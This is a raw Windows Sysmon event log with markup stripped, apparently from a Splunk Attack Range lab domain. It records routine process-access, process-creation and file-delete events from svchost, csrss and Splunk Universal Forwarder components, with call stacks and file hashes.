08:05:27.054{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809970Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.054{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809969Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.054{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809968Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.054{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809967Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.054{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809966Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.054{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809965Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.038{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809964Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.038{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809963Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.038{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809962Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.038{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F7C7-60EB-D279-00000000D001}1516C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809961Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.038{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F7C7-60EB-D279-00000000D001}1516C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809960Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.039{0C1E0330-F7C7-60EB-D279-00000000D001}1516C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810004Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:28.725{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF727691660704B97CCC3BBAC8B70CA8,SHA256=1F37EE5A7BC669C2C917C01A5D0C9E987427717AFD4C87702D8693B7150691CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053692Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:28.127{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42FD1367867DAE744E165B28A9F199C5,SHA256=3F7976411FD1A21AACB942147BBD69724B51D56696C5A7121B3CDCA7576FE257,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810003Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:28.522{0C1E0330-F7C8-60EB-D479-00000000D001}22963408C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810002Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:28.382{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F7C8-60EB-D479-00000000D001}2296C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810001Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:28.366{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810000Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:28.366{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809999Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:28.366{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809998Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:28.366{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809997Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:28.366{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809996Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:28.366{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809995Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:28.366{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809994Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:28.366{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809993Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:28.366{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809992Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:28.366{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F7C8-60EB-D479-00000000D001}2296C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809991Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:28.366{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F7C8-60EB-D479-00000000D001}2296C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809990Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:28.351{0C1E0330-F7C8-60EB-D479-00000000D001}2296C:\Program 